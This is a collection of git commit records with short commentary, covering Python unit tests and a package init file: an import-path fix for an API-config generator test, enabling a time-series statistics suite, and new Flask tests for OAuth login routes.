self.assertIn(each, self.latest)
self.assertGreater(len(self.latest[each]), 0)
def test_meta_specs(self):
# these sections must exist in the meta_specs, have an 'archive_file_name' field,
# and it must not be empty
for each in ['analysis_target', 'branch_info', 'machine-id', 'uploader_log']:
self.assertIn(each, self.latest['meta_specs'])
self.assertIn('archive_file_name', self.latest['meta_specs'][each])
self.assertGreater(len(self.latest['meta_specs'][each]['archive_file_name']), 0)
def test_specs(self):
# check that each spec only has target sections for known targets
for eachspec in self.latest['specs']:
for eachtarget in self.latest['specs'][eachspec]:
self.assertIn(eachtarget, ['host', 'docker_container', 'docker_image'])
|
Fix failing API gen test
|
Fix failing API gen test
|
Python
|
apache-2.0
|
RedHatInsights/insights-core,RedHatInsights/insights-core
|
import unittest
from tools import generate_api_config
class TestAPIGen(unittest.TestCase):
@classmethod
def setUpClass(cls):
from falafel.mappers import * # noqa
pass
def setUp(self):
self.latest = generate_api_config.APIConfigGenerator(plugin_package="falafel").serialize_data_spec()
def tearDown(self):
self.latest = None
def test_top_level(self):
# these sections must exist and not be empty
for each in ['version', 'files', 'commands', 'specs', 'pre_commands', 'meta_specs']:
self.assertIn(each, self.latest)
self.assertGreater(len(self.latest[each]), 0)
def test_meta_specs(self):
# these sections must exist in the meta_specs, have an 'archive_file_name' field,
# and it must not be empty
for each in ['analysis_target', 'branch_info', 'machine-id', 'uploader_log']:
self.assertIn(each, self.latest['meta_specs'])
self.assertIn('archive_file_name', self.latest['meta_specs'][each])
self.assertGreater(len(self.latest['meta_specs'][each]['archive_file_name']), 0)
def test_specs(self):
# check that each spec only has target sections for known targets
for eachspec in self.latest['specs']:
for eachtarget in self.latest['specs'][eachspec]:
self.assertIn(eachtarget, ['host', 'docker_container', 'docker_image'])
Fix failing API gen test
|
import unittest
from falafel.tools import generate_api_config
class TestAPIGen(unittest.TestCase):
@classmethod
def setUpClass(cls):
from falafel.mappers import * # noqa
pass
def setUp(self):
self.latest = generate_api_config.APIConfigGenerator(plugin_package="falafel").serialize_data_spec()
def tearDown(self):
self.latest = None
def test_top_level(self):
# these sections must exist and not be empty
for each in ['version', 'files', 'commands', 'specs', 'pre_commands', 'meta_specs']:
self.assertIn(each, self.latest)
self.assertGreater(len(self.latest[each]), 0)
def test_meta_specs(self):
# these sections must exist in the meta_specs, have an 'archive_file_name' field,
# and it must not be empty
for each in ['analysis_target', 'branch_info', 'machine-id', 'uploader_log']:
self.assertIn(each, self.latest['meta_specs'])
self.assertIn('archive_file_name', self.latest['meta_specs'][each])
self.assertGreater(len(self.latest['meta_specs'][each]['archive_file_name']), 0)
def test_specs(self):
# check that each spec only has target sections for known targets
for eachspec in self.latest['specs']:
for eachtarget in self.latest['specs'][eachspec]:
self.assertIn(eachtarget, ['host', 'docker_container', 'docker_image'])
|
<commit_before>import unittest
from tools import generate_api_config
class TestAPIGen(unittest.TestCase):
@classmethod
def setUpClass(cls):
from falafel.mappers import * # noqa
pass
def setUp(self):
self.latest = generate_api_config.APIConfigGenerator(plugin_package="falafel").serialize_data_spec()
def tearDown(self):
self.latest = None
def test_top_level(self):
# these sections must exist and not be empty
for each in ['version', 'files', 'commands', 'specs', 'pre_commands', 'meta_specs']:
self.assertIn(each, self.latest)
self.assertGreater(len(self.latest[each]), 0)
def test_meta_specs(self):
# these sections must exist in the meta_specs, have an 'archive_file_name' field,
# and it must not be empty
for each in ['analysis_target', 'branch_info', 'machine-id', 'uploader_log']:
self.assertIn(each, self.latest['meta_specs'])
self.assertIn('archive_file_name', self.latest['meta_specs'][each])
self.assertGreater(len(self.latest['meta_specs'][each]['archive_file_name']), 0)
def test_specs(self):
# check that each spec only has target sections for known targets
for eachspec in self.latest['specs']:
for eachtarget in self.latest['specs'][eachspec]:
self.assertIn(eachtarget, ['host', 'docker_container', 'docker_image'])
<commit_msg>Fix failing API gen test<commit_after>
|
import unittest
from falafel.tools import generate_api_config
class TestAPIGen(unittest.TestCase):
@classmethod
def setUpClass(cls):
from falafel.mappers import * # noqa
pass
def setUp(self):
self.latest = generate_api_config.APIConfigGenerator(plugin_package="falafel").serialize_data_spec()
def tearDown(self):
self.latest = None
def test_top_level(self):
# these sections must exist and not be empty
for each in ['version', 'files', 'commands', 'specs', 'pre_commands', 'meta_specs']:
self.assertIn(each, self.latest)
self.assertGreater(len(self.latest[each]), 0)
def test_meta_specs(self):
# these sections must exist in the meta_specs, have an 'archive_file_name' field,
# and it must not be empty
for each in ['analysis_target', 'branch_info', 'machine-id', 'uploader_log']:
self.assertIn(each, self.latest['meta_specs'])
self.assertIn('archive_file_name', self.latest['meta_specs'][each])
self.assertGreater(len(self.latest['meta_specs'][each]['archive_file_name']), 0)
def test_specs(self):
# check that each spec only has target sections for known targets
for eachspec in self.latest['specs']:
for eachtarget in self.latest['specs'][eachspec]:
self.assertIn(eachtarget, ['host', 'docker_container', 'docker_image'])
|
import unittest
from tools import generate_api_config
class TestAPIGen(unittest.TestCase):
@classmethod
def setUpClass(cls):
from falafel.mappers import * # noqa
pass
def setUp(self):
self.latest = generate_api_config.APIConfigGenerator(plugin_package="falafel").serialize_data_spec()
def tearDown(self):
self.latest = None
def test_top_level(self):
# these sections must exist and not be empty
for each in ['version', 'files', 'commands', 'specs', 'pre_commands', 'meta_specs']:
self.assertIn(each, self.latest)
self.assertGreater(len(self.latest[each]), 0)
def test_meta_specs(self):
# these sections must exist in the meta_specs, have an 'archive_file_name' field,
# and it must not be empty
for each in ['analysis_target', 'branch_info', 'machine-id', 'uploader_log']:
self.assertIn(each, self.latest['meta_specs'])
self.assertIn('archive_file_name', self.latest['meta_specs'][each])
self.assertGreater(len(self.latest['meta_specs'][each]['archive_file_name']), 0)
def test_specs(self):
# check that each spec only has target sections for known targets
for eachspec in self.latest['specs']:
for eachtarget in self.latest['specs'][eachspec]:
self.assertIn(eachtarget, ['host', 'docker_container', 'docker_image'])
Fix failing API gen testimport unittest
from falafel.tools import generate_api_config
class TestAPIGen(unittest.TestCase):
@classmethod
def setUpClass(cls):
from falafel.mappers import * # noqa
pass
def setUp(self):
self.latest = generate_api_config.APIConfigGenerator(plugin_package="falafel").serialize_data_spec()
def tearDown(self):
self.latest = None
def test_top_level(self):
# these sections must exist and not be empty
for each in ['version', 'files', 'commands', 'specs', 'pre_commands', 'meta_specs']:
self.assertIn(each, self.latest)
self.assertGreater(len(self.latest[each]), 0)
def test_meta_specs(self):
# these sections must exist in the meta_specs, have an 'archive_file_name' field,
# and it must not be empty
for each in ['analysis_target', 'branch_info', 'machine-id', 'uploader_log']:
self.assertIn(each, self.latest['meta_specs'])
self.assertIn('archive_file_name', self.latest['meta_specs'][each])
self.assertGreater(len(self.latest['meta_specs'][each]['archive_file_name']), 0)
def test_specs(self):
# check that each spec only has target sections for known targets
for eachspec in self.latest['specs']:
for eachtarget in self.latest['specs'][eachspec]:
self.assertIn(eachtarget, ['host', 'docker_container', 'docker_image'])
|
<commit_before>import unittest
from tools import generate_api_config
class TestAPIGen(unittest.TestCase):
@classmethod
def setUpClass(cls):
from falafel.mappers import * # noqa
pass
def setUp(self):
self.latest = generate_api_config.APIConfigGenerator(plugin_package="falafel").serialize_data_spec()
def tearDown(self):
self.latest = None
def test_top_level(self):
# these sections must exist and not be empty
for each in ['version', 'files', 'commands', 'specs', 'pre_commands', 'meta_specs']:
self.assertIn(each, self.latest)
self.assertGreater(len(self.latest[each]), 0)
def test_meta_specs(self):
# these sections must exist in the meta_specs, have an 'archive_file_name' field,
# and it must not be empty
for each in ['analysis_target', 'branch_info', 'machine-id', 'uploader_log']:
self.assertIn(each, self.latest['meta_specs'])
self.assertIn('archive_file_name', self.latest['meta_specs'][each])
self.assertGreater(len(self.latest['meta_specs'][each]['archive_file_name']), 0)
def test_specs(self):
# check that each spec only has target sections for known targets
for eachspec in self.latest['specs']:
for eachtarget in self.latest['specs'][eachspec]:
self.assertIn(eachtarget, ['host', 'docker_container', 'docker_image'])
<commit_msg>Fix failing API gen test<commit_after>import unittest
from falafel.tools import generate_api_config
class TestAPIGen(unittest.TestCase):
@classmethod
def setUpClass(cls):
from falafel.mappers import * # noqa
pass
def setUp(self):
self.latest = generate_api_config.APIConfigGenerator(plugin_package="falafel").serialize_data_spec()
def tearDown(self):
self.latest = None
def test_top_level(self):
# these sections must exist and not be empty
for each in ['version', 'files', 'commands', 'specs', 'pre_commands', 'meta_specs']:
self.assertIn(each, self.latest)
self.assertGreater(len(self.latest[each]), 0)
def test_meta_specs(self):
# these sections must exist in the meta_specs, have an 'archive_file_name' field,
# and it must not be empty
for each in ['analysis_target', 'branch_info', 'machine-id', 'uploader_log']:
self.assertIn(each, self.latest['meta_specs'])
self.assertIn('archive_file_name', self.latest['meta_specs'][each])
self.assertGreater(len(self.latest['meta_specs'][each]['archive_file_name']), 0)
def test_specs(self):
# check that each spec only has target sections for known targets
for eachspec in self.latest['specs']:
for eachtarget in self.latest['specs'][eachspec]:
self.assertIn(eachtarget, ['host', 'docker_container', 'docker_image'])
|
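The fix in this record swaps a bare `from tools import generate_api_config` for the package-qualified `from falafel.tools import generate_api_config`: the bare form only resolves when the test runner's working directory happens to put tools/ on sys.path, while the qualified form resolves wherever the falafel package is importable. A hypothetical sketch of the same idea (the fallback branch is illustrative, not part of the record):

import importlib

def load_generator():
    # Prefer the package-qualified path; fall back to the old flat layout
    # only so the sketch also runs against pre-fix checkouts.
    for name in ('falafel.tools.generate_api_config',
                 'tools.generate_api_config'):
        try:
            return importlib.import_module(name)
        except ImportError:
            continue
    raise ImportError('generate_api_config not found under either layout')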
5ed0474407669ebbca1e2a3f5a74ea3260bd3f2b
|
TimeSeriesTools/__init__.py
|
TimeSeriesTools/__init__.py
|
__author__ = 'To\xc3\xb1o G. Quintela (tgq.spm@gmail.com)'
__version__ = '0.0.0'
#from pyCausality.TimeSeries.TS import *
#from pyCausality.TimeSeries.automatic_thresholding import *
#from pyCausality.TimeSeries.distances import *
#from pyCausality.TimeSeries.measures import *
#from pyCausality.TimeSeries.smoothing import *
#from pyCausality.TimeSeries.transformations import *
from tests import test_artificial_data
from tests import test_utils
from tests import test_measures
from tests import test_transformations
from tests import test_burstdetection
from tests import test_tsstatistics
from tests import test_regimedetection
from tests import test_feature_extraction
from tests import test_similarities
## Administrative information
import release
import version
## Suppress warnings
import warnings
with warnings.catch_warnings():
warnings.simplefilter("ignore")
warnings.simplefilter("ignore")
def test():
## Tests of modules
test_artificial_data.test()
# test_utils.test()
# test_measures.test()
test_transformations.test()
test_burstdetection.test()
# test_tsstatistics.test()
# test_regimedetection.test()
# test_feature_extraction.test()
# test_similarities.test()
|
__author__ = 'To\xc3\xb1o G. Quintela (tgq.spm@gmail.com)'
__version__ = '0.0.0'
#from pyCausality.TimeSeries.TS import *
#from pyCausality.TimeSeries.automatic_thresholding import *
#from pyCausality.TimeSeries.distances import *
#from pyCausality.TimeSeries.measures import *
#from pyCausality.TimeSeries.smoothing import *
#from pyCausality.TimeSeries.transformations import *
from tests import test_artificial_data
from tests import test_utils
from tests import test_measures
from tests import test_transformations
from tests import test_burstdetection
from tests import test_tsstatistics
from tests import test_regimedetection
from tests import test_feature_extraction
from tests import test_similarities
## Administrative information
import release
import version
## Suppress warnings
import warnings
with warnings.catch_warnings():
warnings.simplefilter("ignore")
warnings.simplefilter("ignore")
def test():
## Tests of modules
test_artificial_data.test()
# test_utils.test()
# test_measures.test()
test_transformations.test()
test_burstdetection.test()
test_tsstatistics.test()
# test_regimedetection.test()
# test_feature_extraction.test()
# test_similarities.test()
|
Add ts statistics to the tests module.
|
Add ts statistics to the tests module.
|
Python
|
mit
|
tgquintela/TimeSeriesTools,tgquintela/TimeSeriesTools
|
__author__ = 'To\xc3\xb1o G. Quintela (tgq.spm@gmail.com)'
__version__ = '0.0.0'
#from pyCausality.TimeSeries.TS import *
#from pyCausality.TimeSeries.automatic_thresholding import *
#from pyCausality.TimeSeries.distances import *
#from pyCausality.TimeSeries.measures import *
#from pyCausality.TimeSeries.smoothing import *
#from pyCausality.TimeSeries.transformations import *
from tests import test_artificial_data
from tests import test_utils
from tests import test_measures
from tests import test_transformations
from tests import test_burstdetection
from tests import test_tsstatistics
from tests import test_regimedetection
from tests import test_feature_extraction
from tests import test_similarities
## Administrative information
import release
import version
## Suppress warnings
import warnings
with warnings.catch_warnings():
warnings.simplefilter("ignore")
warnings.simplefilter("ignore")
def test():
## Tests of modules
test_artificial_data.test()
# test_utils.test()
# test_measures.test()
test_transformations.test()
test_burstdetection.test()
# test_tsstatistics.test()
# test_regimedetection.test()
# test_feature_extraction.test()
# test_similarities.test()
Add ts statistics to the tests module.
|
__author__ = 'To\xc3\xb1o G. Quintela (tgq.spm@gmail.com)'
__version__ = '0.0.0'
#from pyCausality.TimeSeries.TS import *
#from pyCausality.TimeSeries.automatic_thresholding import *
#from pyCausality.TimeSeries.distances import *
#from pyCausality.TimeSeries.measures import *
#from pyCausality.TimeSeries.smoothing import *
#from pyCausality.TimeSeries.transformations import *
from tests import test_artificial_data
from tests import test_utils
from tests import test_measures
from tests import test_transformations
from tests import test_burstdetection
from tests import test_tsstatistics
from tests import test_regimedetection
from tests import test_feature_extraction
from tests import test_similarities
## Administrative information
import release
import version
## Suppress warnings
import warnings
with warnings.catch_warnings():
warnings.simplefilter("ignore")
warnings.simplefilter("ignore")
def test():
## Tests of modules
test_artificial_data.test()
# test_utils.test()
# test_measures.test()
test_transformations.test()
test_burstdetection.test()
test_tsstatistics.test()
# test_regimedetection.test()
# test_feature_extraction.test()
# test_similarities.test()
|
<commit_before>
__author__ = 'To\xc3\xb1o G. Quintela (tgq.spm@gmail.com)'
__version__ = '0.0.0'
#from pyCausality.TimeSeries.TS import *
#from pyCausality.TimeSeries.automatic_thresholding import *
#from pyCausality.TimeSeries.distances import *
#from pyCausality.TimeSeries.measures import *
#from pyCausality.TimeSeries.smoothing import *
#from pyCausality.TimeSeries.transformations import *
from tests import test_artificial_data
from tests import test_utils
from tests import test_measures
from tests import test_transformations
from tests import test_burstdetection
from tests import test_tsstatistics
from tests import test_regimedetection
from tests import test_feature_extraction
from tests import test_similarities
## Administrative information
import release
import version
## Suppress warnings
import warnings
with warnings.catch_warnings():
warnings.simplefilter("ignore")
warnings.simplefilter("ignore")
def test():
## Tests of modules
test_artificial_data.test()
# test_utils.test()
# test_measures.test()
test_transformations.test()
test_burstdetection.test()
# test_tsstatistics.test()
# test_regimedetection.test()
# test_feature_extraction.test()
# test_similarities.test()
<commit_msg>Add ts statistics to the tests module.<commit_after>
|
__author__ = 'To\xc3\xb1o G. Quintela (tgq.spm@gmail.com)'
__version__ = '0.0.0'
#from pyCausality.TimeSeries.TS import *
#from pyCausality.TimeSeries.automatic_thresholding import *
#from pyCausality.TimeSeries.distances import *
#from pyCausality.TimeSeries.measures import *
#from pyCausality.TimeSeries.smoothing import *
#from pyCausality.TimeSeries.transformations import *
from tests import test_artificial_data
from tests import test_utils
from tests import test_measures
from tests import test_transformations
from tests import test_burstdetection
from tests import test_tsstatistics
from tests import test_regimedetection
from tests import test_feature_extraction
from tests import test_similarities
## Administrative information
import release
import version
## Suppress warnings
import warnings
with warnings.catch_warnings():
warnings.simplefilter("ignore")
warnings.simplefilter("ignore")
def test():
## Tests of modules
test_artificial_data.test()
# test_utils.test()
# test_measures.test()
test_transformations.test()
test_burstdetection.test()
test_tsstatistics.test()
# test_regimedetection.test()
# test_feature_extraction.test()
# test_similarities.test()
|
__author__ = 'To\xc3\xb1o G. Quintela (tgq.spm@gmail.com)'
__version__ = '0.0.0'
#from pyCausality.TimeSeries.TS import *
#from pyCausality.TimeSeries.automatic_thresholding import *
#from pyCausality.TimeSeries.distances import *
#from pyCausality.TimeSeries.measures import *
#from pyCausality.TimeSeries.smoothing import *
#from pyCausality.TimeSeries.transformations import *
from tests import test_artificial_data
from tests import test_utils
from tests import test_measures
from tests import test_transformations
from tests import test_burstdetection
from tests import test_tsstatistics
from tests import test_regimedetection
from tests import test_feature_extraction
from tests import test_similarities
## Administrative information
import release
import version
## Suppress warnings
import warnings
with warnings.catch_warnings():
warnings.simplefilter("ignore")
warnings.simplefilter("ignore")
def test():
## Tests of modules
test_artificial_data.test()
# test_utils.test()
# test_measures.test()
test_transformations.test()
test_burstdetection.test()
# test_tsstatistics.test()
# test_regimedetection.test()
# test_feature_extraction.test()
# test_similarities.test()
Add ts statistics to the tests module.
__author__ = 'To\xc3\xb1o G. Quintela (tgq.spm@gmail.com)'
__version__ = '0.0.0'
#from pyCausality.TimeSeries.TS import *
#from pyCausality.TimeSeries.automatic_thresholding import *
#from pyCausality.TimeSeries.distances import *
#from pyCausality.TimeSeries.measures import *
#from pyCausality.TimeSeries.smoothing import *
#from pyCausality.TimeSeries.transformations import *
from tests import test_artificial_data
from tests import test_utils
from tests import test_measures
from tests import test_transformations
from tests import test_burstdetection
from tests import test_tsstatistics
from tests import test_regimedetection
from tests import test_feature_extraction
from tests import test_similarities
## Administrative information
import release
import version
## Suppress warnings
import warnings
with warnings.catch_warnings():
warnings.simplefilter("ignore")
warnings.simplefilter("ignore")
def test():
## Tests of modules
test_artificial_data.test()
# test_utils.test()
# test_measures.test()
test_transformations.test()
test_burstdetection.test()
test_tsstatistics.test()
# test_regimedetection.test()
# test_feature_extraction.test()
# test_similarities.test()
|
<commit_before>
__author__ = 'To\xc3\xb1o G. Quintela (tgq.spm@gmail.com)'
__version__ = '0.0.0'
#from pyCausality.TimeSeries.TS import *
#from pyCausality.TimeSeries.automatic_thresholding import *
#from pyCausality.TimeSeries.distances import *
#from pyCausality.TimeSeries.measures import *
#from pyCausality.TimeSeries.smoothing import *
#from pyCausality.TimeSeries.transformations import *
from tests import test_artificial_data
from tests import test_utils
from tests import test_measures
from tests import test_transformations
from tests import test_burstdetection
from tests import test_tsstatistics
from tests import test_regimedetection
from tests import test_feature_extraction
from tests import test_similarities
## Administrative information
import release
import version
## Suppress warnings
import warnings
with warnings.catch_warnings():
warnings.simplefilter("ignore")
warnings.simplefilter("ignore")
def test():
## Tests of modules
test_artificial_data.test()
# test_utils.test()
# test_measures.test()
test_transformations.test()
test_burstdetection.test()
# test_tsstatistics.test()
# test_regimedetection.test()
# test_feature_extraction.test()
# test_similarities.test()
<commit_msg>Add ts statistics to the tests module.<commit_after>
__author__ = 'To\xc3\xb1o G. Quintela (tgq.spm@gmail.com)'
__version__ = '0.0.0'
#from pyCausality.TimeSeries.TS import *
#from pyCausality.TimeSeries.automatic_thresholding import *
#from pyCausality.TimeSeries.distances import *
#from pyCausality.TimeSeries.measures import *
#from pyCausality.TimeSeries.smoothing import *
#from pyCausality.TimeSeries.transformations import *
from tests import test_artificial_data
from tests import test_utils
from tests import test_measures
from tests import test_transformations
from tests import test_burstdetection
from tests import test_tsstatistics
from tests import test_regimedetection
from tests import test_feature_extraction
from tests import test_similarities
## Administrative information
import release
import version
## Suppress warnings
import warnings
with warnings.catch_warnings():
warnings.simplefilter("ignore")
warnings.simplefilter("ignore")
def test():
## Tests of modules
test_artificial_data.test()
# test_utils.test()
# test_measures.test()
test_transformations.test()
test_burstdetection.test()
test_tsstatistics.test()
# test_regimedetection.test()
# test_feature_extraction.test()
# test_similarities.test()
|
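The commit above enables a suite by uncommenting one call in the package-level test(). A sketch of the same toggle expressed as data, assuming the tests package layout shown in the record (module names taken from it):

import importlib

# Suites currently considered stable; enabling one becomes a one-line list
# edit instead of uncommenting a call in the function body.
ENABLED_SUITES = ['test_artificial_data', 'test_transformations',
                  'test_burstdetection', 'test_tsstatistics']

def test():
    for name in ENABLED_SUITES:
        importlib.import_module('tests.' + name).test()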
76abc1d6043a509418027c618d16c5a38502f2f2
|
findaconf/tests/test_site_routes.py
|
findaconf/tests/test_site_routes.py
|
# coding: utf-8
from findaconf import app, db
from findaconf.tests.config import set_app, unset_app
from unittest import TestCase
class TestSiteRoutes(TestCase):
def setUp(self):
self.app = set_app(app, db)
def tearDown(self):
unset_app(db)
# test routes from blueprint/site.py
def test_index(self):
resp = self.app.get('/')
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
def test_find(self):
resp = self.app.get('/find', data={'query': 'sociology',
'month': 'February',
'year': 2015,
'region': 'Europe',
'location': 'University of Essex'})
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
def test_login(self):
# test if login page exists
resp = self.app.get('/login')
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
# test if there is a link to login on the home page
resp = self.app.get('/')
assert 'href="/login"' in resp.data
|
# coding: utf-8
from findaconf import app, db
from findaconf.tests.config import set_app, unset_app
from unittest import TestCase
class TestSiteRoutes(TestCase):
def setUp(self):
self.app = set_app(app, db)
def tearDown(self):
unset_app(db)
# test routes from blueprint/site.py
def test_index(self):
resp = self.app.get('/')
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
def test_find(self):
resp = self.app.get('/find', data={'query': 'sociology',
'month': 'February',
'year': 2015,
'region': 'Europe',
'location': 'University of Essex'})
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
def test_login(self):
# test if login page exists
resp = self.app.get('/login')
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
# test if there are links to oauth/oauth2 providers
providers = app.config['OAUTH_CREDENTIALS'].keys()
for provider in providers:
assert 'href="/login/{}'.format(provider) in resp.data
# test if there is a link to login on the home page
resp = self.app.get('/')
assert 'href="/login"' in resp.data
def test_login_providers(self):
# test the links to the oauth/oauth2 providers
providers = app.config['OAUTH_CREDENTIALS'].keys()
for provider in providers:
resp = self.app.get('/login/{}'.format(provider))
assert resp.status_code == 200
# test if unauthorized provider returns 404
resp = self.app.get('/login/anything_else')
assert resp.status_code == 404
|
Add tests for login oauth links
|
Add tests for login oauth links
|
Python
|
mit
|
cuducos/findaconf,cuducos/findaconf,koorukuroo/findaconf,koorukuroo/findaconf,koorukuroo/findaconf,cuducos/findaconf
|
# coding: utf-8
from findaconf import app, db
from findaconf.tests.config import set_app, unset_app
from unittest import TestCase
class TestSiteRoutes(TestCase):
def setUp(self):
self.app = set_app(app, db)
def tearDown(self):
unset_app(db)
# test routes from blueprint/site.py
def test_index(self):
resp = self.app.get('/')
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
def test_find(self):
resp = self.app.get('/find', data={'query': 'sociology',
'month': 'February',
'year': 2015,
'region': 'Europe',
'location': 'University of Essex'})
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
def test_login(self):
# test if login page exists
resp = self.app.get('/login')
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
# test if there is a link to login on the home page
resp = self.app.get('/')
assert 'href="/login"' in resp.dataAdd tests for login oauth links
|
# coding: utf-8
from findaconf import app, db
from findaconf.tests.config import set_app, unset_app
from unittest import TestCase
class TestSiteRoutes(TestCase):
def setUp(self):
self.app = set_app(app, db)
def tearDown(self):
unset_app(db)
# test routes from blueprint/site.py
def test_index(self):
resp = self.app.get('/')
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
def test_find(self):
resp = self.app.get('/find', data={'query': 'sociology',
'month': 'February',
'year': 2015,
'region': 'Europe',
'location': 'University of Essex'})
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
def test_login(self):
# test if login page exists
resp = self.app.get('/login')
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
# test if there are links to oauth/oauth2 providers
providers = app.config['OAUTH_CREDENTIALS'].keys()
for provider in providers:
assert 'href="/login/{}'.format(provider) in resp.data
# test if there is a link to login on the home page
resp = self.app.get('/')
assert 'href="/login"' in resp.data
def test_login_providers(self):
# test the links to the oauth/oauth2 providers
providers = app.config['OAUTH_CREDENTIALS'].keys()
for provider in providers:
resp = self.app.get('/login/{}'.format(provider))
assert resp.status_code == 200
# test if unauthorized provider returns 404
resp = self.app.get('/login/anything_else')
assert resp.status_code == 404
|
<commit_before># coding: utf-8
from findaconf import app, db
from findaconf.tests.config import set_app, unset_app
from unittest import TestCase
class TestSiteRoutes(TestCase):
def setUp(self):
self.app = set_app(app, db)
def tearDown(self):
unset_app(db)
# test routes from blueprint/site.py
def test_index(self):
resp = self.app.get('/')
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
def test_find(self):
resp = self.app.get('/find', data={'query': 'sociology',
'month': 'February',
'year': 2015,
'region': 'Europe',
'location': 'University of Essex'})
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
def test_login(self):
# test if login page exists
resp = self.app.get('/login')
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
# test if there is a link to login on the home page
resp = self.app.get('/')
assert 'href="/login"' in resp.data<commit_msg>Add tests for login oauth links<commit_after>
|
# coding: utf-8
from findaconf import app, db
from findaconf.tests.config import set_app, unset_app
from unittest import TestCase
class TestSiteRoutes(TestCase):
def setUp(self):
self.app = set_app(app, db)
def tearDown(self):
unset_app(db)
# test routes from blueprint/site.py
def test_index(self):
resp = self.app.get('/')
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
def test_find(self):
resp = self.app.get('/find', data={'query': 'sociology',
'month': 'February',
'year': 2015,
'region': 'Europe',
'location': 'University of Essex'})
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
def test_login(self):
# test if login page exists
resp = self.app.get('/login')
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
# test if there are links to oauth/oauth2 providers
providers = app.config['OAUTH_CREDENTIALS'].keys()
for provider in providers:
assert 'href="/login/{}'.format(provider) in resp.data
# test if there is a link to login on the home page
resp = self.app.get('/')
assert 'href="/login"' in resp.data
def test_login_providers(self):
# test the links to the oauth/oauth2 providers
providers = app.config['OAUTH_CREDENTIALS'].keys()
for provider in providers:
resp = self.app.get('/login/{}'.format(provider))
assert resp.status_code == 200
# test if unauthorized provider returns 404
resp = self.app.get('/login/anything_else')
assert resp.status_code == 404
|
# coding: utf-8
from findaconf import app, db
from findaconf.tests.config import set_app, unset_app
from unittest import TestCase
class TestSiteRoutes(TestCase):
def setUp(self):
self.app = set_app(app, db)
def tearDown(self):
unset_app(db)
# test routes from blueprint/site.py
def test_index(self):
resp = self.app.get('/')
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
def test_find(self):
resp = self.app.get('/find', data={'query': 'sociology',
'month': 'February',
'year': 2015,
'region': 'Europe',
'location': 'University of Essex'})
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
def test_login(self):
# test if login page exists
resp = self.app.get('/login')
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
# test if there is a link to login on the home page
resp = self.app.get('/')
assert 'href="/login"' in resp.dataAdd tests for login oauth links# coding: utf-8
from findaconf import app, db
from findaconf.tests.config import set_app, unset_app
from unittest import TestCase
class TestSiteRoutes(TestCase):
def setUp(self):
self.app = set_app(app, db)
def tearDown(self):
unset_app(db)
# test routes from blueprint/site.py
def test_index(self):
resp = self.app.get('/')
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
def test_find(self):
resp = self.app.get('/find', data={'query': 'sociology',
'month': 'February',
'year': 2015,
'region': 'Europe',
'location': 'University of Essex'})
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
def test_login(self):
# test if login page exists
resp = self.app.get('/login')
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
# test if there are links to oauth/oauth2 providers
providers = app.config['OAUTH_CREDENTIALS'].keys()
for provider in providers:
assert 'href="/login/{}'.format(provider) in resp.data
# test if there is a link to login on the home page
resp = self.app.get('/')
assert 'href="/login"' in resp.data
def test_login_providers(self):
# test the links to the oauth/oauth2 providers
providers = app.config['OAUTH_CREDENTIALS'].keys()
for provider in providers:
resp = self.app.get('/login/{}'.format(provider))
assert resp.status_code == 200
# test if unauthorized provider returns 404
resp = self.app.get('/login/anything_else')
assert resp.status_code == 404
|
<commit_before># coding: utf-8
from findaconf import app, db
from findaconf.tests.config import set_app, unset_app
from unittest import TestCase
class TestSiteRoutes(TestCase):
def setUp(self):
self.app = set_app(app, db)
def tearDown(self):
unset_app(db)
# test routes from blueprint/site.py
def test_index(self):
resp = self.app.get('/')
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
def test_find(self):
resp = self.app.get('/find', data={'query': 'sociology',
'month': 'February',
'year': 2015,
'region': 'Europe',
'location': 'University of Essex'})
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
def test_login(self):
# test if login page exists
resp = self.app.get('/login')
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
# test if there is a link to login on the home page
resp = self.app.get('/')
assert 'href="/login"' in resp.data<commit_msg>Add tests for login oauth links<commit_after># coding: utf-8
from findaconf import app, db
from findaconf.tests.config import set_app, unset_app
from unittest import TestCase
class TestSiteRoutes(TestCase):
def setUp(self):
self.app = set_app(app, db)
def tearDown(self):
unset_app(db)
# test routes from blueprint/site.py
def test_index(self):
resp = self.app.get('/')
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
def test_find(self):
resp = self.app.get('/find', data={'query': 'sociology',
'month': 'February',
'year': 2015,
'region': 'Europe',
'location': 'University of Essex'})
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
def test_login(self):
# test if login page exists
resp = self.app.get('/login')
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
# test if there are links to oauth/oauth2 providers
providers = app.config['OAUTH_CREDENTIALS'].keys()
for provider in providers:
assert 'href="/login/{}'.format(provider) in resp.data
# test if there is a link to login on the home page
resp = self.app.get('/')
assert 'href="/login"' in resp.data
def test_login_providers(self):
# test the links to the oauth/oauth2 providers
providers = app.config['OAUTH_CREDENTIALS'].keys()
for provider in providers:
resp = self.app.get('/login/{}'.format(provider))
assert resp.status_code == 200
# test if unauthorized provider returns 404
resp = self.app.get('/login/anything_else')
assert resp.status_code == 404
|
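The added tests iterate app.config['OAUTH_CREDENTIALS'] so that a newly configured provider is covered without editing the test. The same check as a standalone helper, a sketch assuming a Flask test client and the config shape shown above (the helper name is hypothetical):

def assert_provider_links(client, config):
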